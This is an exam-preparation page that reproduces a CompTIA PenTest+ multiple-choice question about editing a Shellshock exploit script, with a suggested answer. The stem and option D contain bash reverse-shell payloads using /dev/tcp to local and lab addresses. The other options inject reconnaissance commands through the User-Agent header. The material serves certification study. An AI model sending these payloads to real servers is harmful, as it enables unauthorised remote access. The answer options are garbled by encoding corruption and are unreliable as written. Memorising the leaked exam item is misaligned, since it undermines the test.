Exam PT1-002 topic 1 question 93 discussion

Actual exam question from CompTIA's PT1-002

Question #: 93
Topic #: 1

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploits = {`User-Agent`: `() { ignored;};/bin/bash `"i>& /dev/tcp/127.0.0.1/9090 0>&1`, `Accept`: `text/ html,application/xhtml+xml,application/xml`}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

A. exploits = {ג€User-Agentג€: ג€() { ignored;};/bin/bash ג€"i id;whoamiג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
B. exploits = {ג€User-Agentג€: ג€() { ignored;};/bin/bash ג€"i>& find / -perm -4000ג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
C. exploits = {ג€User-Agentג€: ג€() { ignored;};/bin/sh ג€"i ps ג€"efג€ 0>&1ג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
D. exploits = {ג€User-Agentג€: ג€() { ignored;};/bin/bash ג€"i>& /dev/tcp/10.10.1.1/80ג€ 0>&1ג€, ג€Acceptג€: ג€text/ html,application/xhtml+xml,application/xmlג€}

Show Suggested Answer

Suggested Answer: A 🗳️

by BinarySoldier at Nov. 27, 2021, 9:10 a.m.